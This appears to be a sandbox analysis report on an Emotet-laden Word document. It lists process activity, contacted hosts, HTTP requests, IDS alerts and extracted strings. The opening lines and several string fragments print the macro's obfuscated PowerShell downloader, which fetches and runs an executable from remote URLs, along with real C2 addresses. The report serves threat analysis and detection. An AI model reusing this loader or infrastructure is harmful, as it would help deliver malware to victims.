9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
(PID: 3800)
-
166520.exe
(PID: 2132)
-
cosineinit.exe
(PID: 3768)
-
-
-
-
Network Analysis
DNS Requests
| Domain | Address | Registrar | Country |
|---|---|---|---|
|
ifcingenieria.cl
OSINT |
138.0.120.12
TTL: 1499 |
- | 
Chile |
Contacted Hosts
| IP Address | Port/Protocol | Associated Process | Details |
|---|---|---|---|
|
138.0.120.12 |
80
TCP |
powershell.exe PID: 3800 |
Chile |
|
37.120.170.231 |
443
TCP |
cosineinit.exe PID: 3768 |
Germany |
|
81.21.67.85 |
8080
TCP |
cosineinit.exe PID: 3768 |
United Kingdom |
Contacted Countries
HTTP Traffic
| Endpoint | Request | URL | |
|---|---|---|---|
| 138.0.120.12:80 (ifcingenieria.cl) | GET | ifcingenieria.cl/76j4qo/ | GET /76j4qo/ HTTP/1.1
Host: ifcingenieria.cl
Connection: Keep-Alive 200 OK More Details |
| 81.21.67.85:8080 | GET | 81.21.67.85/ | GET / HTTP/1.1Cookie: 22986=YfPsLfSbd4Y/yDt9dkvBSyvzDiRk06hQ5kQKootMxRN16gKf7UDw5xeHQLGa+63Wa0LEVngjmjKQ6hEk5Dzv7Z6dLgr1u/GUPvPdvLwQwpGMoAqqBHs1nd2IkkR1JLMCqAsQ9a/GfLtFsCWc5Ht5U5YctPH0LQcsHMl8hpOvk3qoq5Z3KA42kojnnkoWCvXUDeTyBS/rUgviG4oaBZKYIO7Mrw4KazYAWAVZtMGA7qrGrnyrb/DMu81dPHWovrDOa2smKTNrTdvKCagZSdJhgFgqJy1JZwHDpBSiuiKgmzgULEjmMZAZ7l8UR91gAP9iPPkT+vCJ8sEKv4r6Rs4AmisCKCx8Xb1TT1c6T+yoa+rTHauO808jGdH+om/jDqXJYzas5zuOKxkZ3YIL3GpCjMqhZEVkext9KubxIwe6Ww8zbnjIUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windo... 200 OK More Details |
Suricata Alerts
| Event | Category | Description | SID |
|---|---|---|---|
| local -> 81.21.67.85:8080 (TCP) | A Network Trojan was detected | ETPRO TROJAN W32/Emotet CnC Checkin | 2830701 |
| 138.0.120.12 -> local:61839 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
| 138.0.120.12 -> local:61839 (TCP) | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | 2016538 |
| 138.0.120.12 -> local:61839 (TCP) | Misc activity | ET INFO EXE - Served Attached HTTP | 2014520 |
ET rules applied using Suricata. Find out more about proofpoint ET Intelligence here.
Extracted Strings
!"#$%&'()*+,-./012345689:;<=>?@ADEa *\G{000204EF-0000-0000-C000-000000000046}#4.2#9#%COMMONPROGRAMFILES%\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation*\CNormal*\CNormal2\(*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library?\&4zTZADLcFXJtFRE0<5cd8073f)zTZADLcFXJtFREt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
!"#$%&'()*+,-./012356789:;<=>?@ABCDWXa[\]^_`defghijklmnopqrstuvwxyz{|}~Root EntryFZ Data
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
!"#%&()*+,-./01345679:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcefghijklmoprtuvwxy{|}~0*pHdProjectQ(@=
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
!Ae1086B=ksPEEBPbGCic@(iqzILs$ssQa@olhfZf(I dFGAjnTcy/ 19fA(VviPtB96872(ccYSow(7489eYmInk70(lsIijE( 59600eQjbuMB(pCPjj(nkSOa@EVHQJA@%weRfjE8^D ^c^% 8D@f4431Aal, -jBjnMbuqXL
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
!AHHCZ%75156iVwuE625@M* HIJmM6312zUhUQ OGXWPwVurLGdno@dar11%bHY@KFlwode@sXYf%522p9395`b, E
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
!DAO TableDef
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
"' & (= *( ,[XX .! 0T-X 2 4X'$
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
"/e5[s`Z'WfPt~f}kA'0z|>|Uw{@tAm'`4T2j
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
"1(IzZ~>Yr]H+9pd\4n(Kg\V$=]B,lDA=eX)Ly5otebW3gp:j$/g*QjZTa!e9#i5*j5fE`514g{7vnO(^ ,j~V9;kvv"adVoTAn7jah+y^@ARhW.GMuO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
"HCqt>;tB]9[9#V1+F)rzb;n5![`lSKh:/n$Ts+wH>b0xgM_jf,ZICr$F3?:BxLu=Jk#Khb$pA=3+?9(ixR3;3+|5;f/qD$G'?6y5c[K|9|u$r=A"bpUs;P{~9fAj72p|E8l^{yowd|YV;(!ebIku}<'V_mWC8<ix~#MKO77\<KdTdu#>q.|@ilA.2Xe\Ktx9s/ivi.6\v9F0jRtt&)KDl s<OCWTOHdo g`\A)v~U:wMl>R^"*76*v\)<pqZ;X&YC*@ $
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
"I8XXXh8@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
"iGJqhUqlO0oiZI25W5WIntb ZAZjtTrjld5F`249v`5K$1!2@ztcDOv0JzvwLj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
#-q8|.[Ck4*j)jnc"ePG7;.h
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
#nNwpzAV5012A;nSTfG
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$ 'AKfY ' z Wo XX jX "X' $ &'X *'( . 0' 2^\ 4
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$' ' ! < XX X X' ' ? ` VXX L BX X'7I8lMrRAHC[,mU9'+'DtfmU9eCAlpEr- )mU9}'+'}'+'mU9+mU9{hCkBBB0B$'.C ' +X P XX }8X X'C++- ' ` Z XX V .X X'ata.,jcA+mU9 JQOx91JmU9+mU'+'9QmU9+mU'+'9O + c'+'imU9+mU9lbmU9+mU9upmU9+mU9:vnmU9+mU9emU9+mU9AmU9+mU9xmU9+mU91mU9+mU9 =mU9+mU9 '+'CDSAx1;)JQmU9+mU9O@JmU9+mU9QOmU9+mU9(tilpmU9+mU9SmU9+mUzjKEQ$' ' Ii % beXX m "X X' ' u !rXX 3X
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$'8 <': @ B> D F/XX Hf~ Jq*X L NX'>mU R'P V XaM Zhz \$XX ^z% `X b dX'TRfjE8^p^S^m^o^c^% 8D$'f j'h n p r|f tXX v xT#X z |X'l' '~ F8 XX z1X X'Rcs.AbRp c/ k.l.l.l.l$' ' - MXX a 6X X'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$.' ",#(7),01444'9=82<.342C
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$E\amR]:B6}9?*<Wfap b1Kc\VCi_7WSUC:ZErq<{J+YsM\#JR<ve. }R9"7V)2GB&|9E;MMTO%Hq88G'v.AnNG*zy{
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$GetRows
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
%windir%\tracing
Unicode based on Runtime Data
(powershell.exe
)
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' Bn XX yX X'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' E" EXX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' W XX i "X X' ' $ &E ( *XX ,| .}X 0 2X'"{ "N" KJ1.mW9.JQmU9+mU9O/1mU9+mU9RI505mU9+mU9D/ue.tmU9+mU9enmU9+mU9remU9+mU9f'+'emU9+mU'+'9ik//:ptmU9+mU9thmU9+mU9@/mU9+mU9tunJ/smU9+mU9_cip/mU9+mUi$'4 : 0 8'6 < >( @ B<nXX Dy FX H JX':"V" N'L R TB Vq XjXX Z^| \WX ^ `X'Pd.Oa d" f'btr j'h n p" r tXX v@ xyX z |X'lEnable ~ b | T 4 N & : h'V" : ' M# =XX eX X'i ' w M UXX X X'icro ' M j ^XX s X X'7:44:5oAttribute VB_Name = "FPAOsHRZpzGcVH"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' ( L XX X X X'$ $'" ( *X ,2 .YXX 0 2imX 4 6X'&cRkY soLFNFiN dw4kmS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' = ^ NXX zm X X' ' Xa a !XX y> X X'1o` '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' J $XX # $X X' Z18aIlstes&&eh=%fXnREwXL,$'" &'$ * ,Z . 0yXX 2~ 4X 6 8X'(' <': @ B\ D FC%XX Hx J=pX L NX'>lDlPGtes&&GwBRPlJz=%mKF[[[[$'PmU T'R X Z1 \ ^UHXX `z< bOX d fX'V j'h n p r8 tXX v xf{X z |X'l12Ces&&s=%NoUfYsKZ7J===
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' x Z 7oXX l xuX X'(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' |n J tXX mX X'V
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'-1'F+!'HULSuHBvjGDHUMSu"BvjL2O 6O K uIpNwjviGAIpNbwvii2ro3oizosJmiCUci0o2J ki|Cdecmo3@m#iK**\CNormalrU~~~~~~l^i"Ks{e!9Yq9aXU\WH.<NThisDocumentProjectzTZADLcFXJtFREModule1FPAOsHRZpzGcVHHULSuHBvjuIpNwjviizosJmiCFB%COMMONPROGRAMFILES%\Microsoft Shared\VBA\VBA7.1\VBE7.DLLVBA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'.Y8?iF7MV_%0kRN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'/U-0y.6=}+zk"h<E7XRk}C:V
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'2 2XX ) X X'Xt.mU9+mU9u.oc.yelmU9+mU9admU9+mU9htimU9+mU9emU9+mU9kmU9+mU9//mU9+mU9:mU9+mU9ptmU9+mUW3mZKKKRK$' ' 5 XX X X' ' + 5 eXX bq X X's.EMZQ9tm'+'U9+mU9cmU9+mU9udm'+'U9+mU9omU9+mU9rp/emU9+mU9gamU9+mU9mmU9+mU9i/'+'wt.moc.smU9+mU9o'+'mU9+mU9tmU9+mU9ada...m.$'{ ' ` 9 DXX nX X'' ' G 8XX i X X'Hw0mU9;)CDSAxmU9+m'+'U91 ,mU9+mU9)(pmU9+mU9e9mU9+mU9gNDtfiDtfrtSoTpmUlqsv&t&t&tB&t$' ' Y XX g&
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'96mLHVO6hKlBbEnd Functio@Sub SmbZcw(LzqMAC, ABEmrN, iEjifo)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'_'-('?''
Ansi based on Image Processing
(screen_4.png)
'B='8\L`"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'theme/theme/_rels/themeManager.xml.relsM
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
( <EQEQEQEQEQEQEQEQEQEQEQHI(((((w666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666v62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@6666 OJPJQJ_HmHnHsHtHJ`JNormaldCJ_HaJmHsHtHDA D
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(*.exe)|*.exe|
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
(*.ico;*.cur)|*.ico;*.cur|
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
(/Q*9 +=GZ|5j~;{ii{@\$Y#Cqap{CjEZ\E,Ml-n;r6E}CS.R_GB60wFur|=\]^wk/l8<i-17qas-=:jNM&p@fPFS![ck68h~4{T6RMvAddXs<gO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(08Normal.dotm1Microsoft Office Word@@W@W
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(;:ujM,"d?%zWSjWzuciny1UBXm?l?e7V2FwNR\xGV9&]SCx
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(`/(A`/n__SRP_32MizosJmiCc=uIpNwjvi8
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(API_CONFORMANCE >= SQL_OAC_LEVEL1
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
(GetRows
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
(p2x&(((((((((((((((((((((((((((((((((((((((22y(((Oqa<6oi;Xm5bR!"kLm.UTHeRzl:}V|jZg.m@)-"k66W,1_jmuWZqd2`vL-eM?QOgwyojZTR?I'i~<!jGG-$$nnn#9gn[\W7>ZJ$]0>aO_^7V6t,QccL\9RBch@~1'7=JPM+R~n$m+(dX0` q=4@9cWM}~a/c% [k1SN;pqwWc[KMMePG%Ps7a.7+S}~'=RSd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(sKEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQER>PEPEPEPEPEPEPH$QXztm+uzQ,}WM.`_9zT&waN#&$/#(%v5shYExj:&fGGN{8v)~_q5I|BUFS?g
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(SQL_CONFORMANCE >= SQL_OSC_MINIMUM
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
(X X'$ ' - f> BXX < a?X " $X'cewCGctacmU9+mU9};kmU9+mU9aerbmU9+mU'+'9;)mU9+mU9'+'CDmU9+mU9SmU9+mU9AxmU9+mU91(mU9+mU9)JQOmemU9+mU9tImU9+mU9-emU9+mU9JQO+JmU9+mU9QOk'+'JQO+JQmU9+mU9OovmU9+mU9nImU9+mU9JQO(&mU9+'+'C@9W$'&7:04 *'( . 0+@ 2P 4XX 6Xl 8gX : <X',ta.Fir @'> D F HB JXX LZ NCX P RX'B5FZ9thmU9'+'+mU9@/'+'omU9+mU9qmU9'+'+mU94mU9+mU9j6'+'mU9+mU97mU9+mU9/lmU9+mU9cmU9+mU9.aimU9+mU9reimU9+mU9negnimU9+mU9cfmU9+mU9i//:mU9+mU9ptth mU9+mU9 mU'+'90uCeeee$'T X'V \ ^t `Zl bXX d f:X h jX'Z n'l r t8B v xjKXX zd | X ~ X'p8WWJRAHC'+'[+1'+'01]RAHC['+'+75]RAH'+'C[( eCAlpEr-69]iw.
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(YjGiLfbTvBha-6351|RBov16912RldULG
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(|3Oj>!M:b=7G\U%]TrjnZ\w?
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
)1yfxxQ|9XJM$d\a^{kOj1ew).HJB\a04j(}6gU'A^-{]\+| g7CKbl JcreMQMRP2xv`j-WuD=]:xKytyHlXW[O<F>cbC{jc->JK"jyjt+ieSj e[9}x
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
*.pdf)|*.pdf|
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
*8dDbB[ b
Ansi based on PCAP Processing
(network.pcap)
*8xVRvtsp>~%76hz_'mR9&Nk^rJ.
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
*LN<->M%AjD
Unicode based on Hybrid Analysis
(166520.exe
, 00047358-00002132.00000000.47862.00161000.00000020.mdmp)
*w ,v-XX .@ 0VX 2 4X'$OwJQO+wFc.l&%tttt$'6YY :'8 > @1 Bx D[XX F H-X J LX'<m P'N T V X ZEXX \ ^3X ` bX'RkBSvYhmXnjzGDhFf% te,wdP$'d' h'f l ne pJq r)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
*y?VmPG%6O^
Unicode based on Hybrid Analysis
(166520.exe
, 00047358-00002132.00000000.47862.00161000.00000020.mdmp)
+51[%YdQUZA<97790<lTKPrE<98612eKqiiO<iWGoYC@<@MrTCkW$GinD(UVKPS!DoiZdMAuHKf)1A2FFtAIi"41232a
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
+iK|>>xf5
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
+INKkD\ox~k#nmnf-H@:z75>g\OuXG6h4t
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
+W+WZFZZZWP
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
,(jcAV rx91v9uOceUlC~U9upmU9+Q0:vne8A8x1 = '+'CDSAx 1;)JQ(O@JQO(ti
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!g theme/theme/theme1.xmlPK-!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
,6+mU9JQO8r%J$' ' T u3 BXX 6 X X' '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
-<Cq8?~*
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
-GetRows
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
./__Jt_Ähactt_IE_I___
Ansi based on Image Processing
(screen_4.png)
/n "C:\02vPLpWc.doc"
Ansi based on Process Commandline
(WINWORD.EXE)
/O % 4XX \B @X X' ' "wM $& &.XX (= *X , .X'6Kt%bHYKFlwokA4$'0 4'2 8 : < >XX @? BX D FX'6
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
/T#WLvS94f2rpmjBz1817QUs`lVnhc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
0 0$0(0,0004080<0@0D0H0L0P0
Ansi based on PCAP Processing
(network.pcap)
0 0$0(0,0d0l0p0t0x0|0
Ansi based on PCAP Processing
(network.pcap)
0$PL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0)R(ug0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0-Nk0qQgU
Ansi based on PCAP Processing
(network.pcap)
0046}#2.0#0#%WINDIR%\system32\e2.tlb#OLE Automation`ENormalENCrmaQF *,\C
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
019C826E445A4649A5B00BF08FCC4EEE
Unicode based on Runtime Data
(WINWORD.EXE
)
043YYFGTa8226F EwaNrF504PDaaWLzX!6854!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
0@0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
Ansi based on PCAP Processing
(network.pcap)
0\Omi-Nn0
Ansi based on PCAP Processing
(network.pcap)
0_?_?_08_'_
Ansi based on Image Processing
(screen_4.png)
0_?c?_0___'_
Ansi based on Image Processing
(screen_8.png)
0CQk0;bW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0f0D0j0D0
Ansi based on PCAP Processing
(network.pcap)
0f0D0j0D0_0
Ansi based on PCAP Processing
(network.pcap)
0f0D0j0D0h0M0k0h
Ansi based on PCAP Processing
(network.pcap)
0f0D0~0[0
Ansi based on PCAP Processing
(network.pcap)
0f0D0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0F0h0W0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0F0h0W0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0g0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0g0o0j0O0
Ansi based on PCAP Processing
(network.pcap)
0h@>nBVqu {5kP?O&CAw0kPo(h[5($=CVs]mY2zw`nKDC]j%KXK'P@$I=Y%C%gx'$!V(ek'Qt!x7xbJ7 oW_y|n;Fido/_1z/L?>o_;9:33`=S,F@)R8elmEv|!/,%qh|'1:`ij.u'kCZ^WcK0'E8Ssd`K}A"NM1I/AeQGF@A~eh-QR9C5
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
0k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0k0;bW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0k0g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0k0W0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0'YM0Y0N0f0
Ansi based on PCAP Processing
(network.pcap)
0L0'YM0Y0N0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0L01XJTU0
Ansi based on PCAP Processing
(network.pcap)
0L0ckW0O0
Ansi based on PCAP Processing
(network.pcap)
0L0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0L0D0c0q0D0g0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0D0c0q0D0k0j0
Ansi based on PCAP Processing
(network.pcap)
0L0j0D0_0
Ansi based on PCAP Processing
(network.pcap)
0L0Nckg0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0X[(WW0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0X[(WW0j0D0K0
Ansi based on PCAP Processing
(network.pcap)
0n0$PL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0n0+g>\~0_0o0HQ-
Ansi based on PCAP Processing
(network.pcap)
0No ListRR$Z0Balloon TextdCJOJQJ^JaJN/N$Z0Balloon Text CharCJOJQJ^JaJPK![Content_Types].xmlN0EH-J@%|$ULTB l,3;rJB+$G]7OV<a(7IR{pgL=r85v&uQ8CX=$?6NJCFB.'.+YT^e55 _g -;Yl|6^N`?[PK!6_rels/.relsj0}Q%v/C/}(h"O
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
0o0D0c0q0D0g0Y0
Ansi based on PCAP Processing
(network.pcap)
0pS7RW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0S0h0L0g0M0
Ansi based on PCAP Processing
(network.pcap)
0S0h0L0g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0Table Normal4
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
0TL0ckW0D0K0i0F0K0
Ansi based on PCAP Processing
(network.pcap)
0TL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0T~0_0o0ju
Ansi based on PCAP Processing
(network.pcap)
0W0f0D0~0[0
Ansi based on PCAP Processing
(network.pcap)
0W0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0W0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
0Y0y0f0n0
Ansi based on PCAP Processing
(network.pcap)
0zc$sk4/|)}i:i:WGrv=qSeO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1
Ansi based on PCAP Processing
(network.pcap)
1 1$1(1,1014181<1@1D1|1
Ansi based on PCAP Processing
(network.pcap)
1 1X1`1d1h1l1p1t1x1|1
Ansi based on PCAP Processing
(network.pcap)
1,24282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
Ansi based on PCAP Processing
(network.pcap)
1073HSSGZ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
14pfbu zoGdnp74101
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
168wU]PXI - CStr(61279) / SNjdC8CLng(XdnfXI)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
197Q* UqrJBbaS`c78%`EGccIB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
1p&VNRtGJ 41BBrkizQ|9mwWA4wdJ9A"YljMWFR
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
1yL-[DR?%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE16\MSO.DLLOffice
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2
Ansi based on PCAP Processing
(network.pcap)
2 2$2(2,2024282p2x2|2
Ansi based on PCAP Processing
(network.pcap)
2 3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3
Ansi based on PCAP Processing
(network.pcap)
2!!22222222222222222222222222222222222222222222222222"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2%2J2P2V2\2
Ansi based on PCAP Processing
(network.pcap)
22JYxMGVQ"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2652VON0oD%
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2@9a0DABA!RhYQQ@JrhdAq
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2mA!OfficgODficg!G{2DF8D04C-5BFA-101B-BDE5gAAe42ggram Files\@CommonMicrosoft Shared\OFFICE16\MSO.DLL#M 16.0 Ob Library%z4@zTZADLcFXJtFREGTZ@ADL@7FXJnFREP
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2p;JXuiQB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2Q^HG-o.&y,G||Hk2mIpBke~-G5p?j}s#QEzR g@CCo$akDk~ _-,Yd[mam:a:.Y9^^)'^53Fem^^53F^c>GKuUt+(vR<G3#gG;?<i9Gg54`u$F95SBgoh %@f'M{qQ,qTQ`^c)F-^]l9YK86=
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2RvIPSNiRHXmaMztiX! jUMV}(CmDiI1uViT,9784A3`hUdPw!1AFLiVlfz653292QirQR?32509#vOdPSj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
3 3$3(3,3034383<3@3D3H3L3P3
Ansi based on PCAP Processing
(network.pcap)
3065"`vvXph!R
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
32621@cWBwS73x`IjfaPpS bCoZs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
326AV7KVDXn3907woP @
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
38*1UwrUMpQ4
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
393a31B8@"9393`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
3c2DaSUXB823`* XWpNuEQ1(9aIbUBT6atfCbBAvjqHKYn
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
3D3L3P3T3X3\3`3d3h3l3p3t3x3|3
Ansi based on PCAP Processing
(network.pcap)
3LcIZhB3wdEOQ3iPFGn`YsGFvFlDlPGGwBRPlJz=%mKF033ql, -`n ivcJPpOZEWsizGGr[FltKUBOB1273UBoVJBKe24pjUKVu0840 c1izH&S82(MpqpAV0418
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
3QNxHA+FGQiI'Qg7B>AMQwY-'Ym,,t
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4 4$4\4d4h4l4p4t4x4|4
Ansi based on PCAP Processing
(network.pcap)
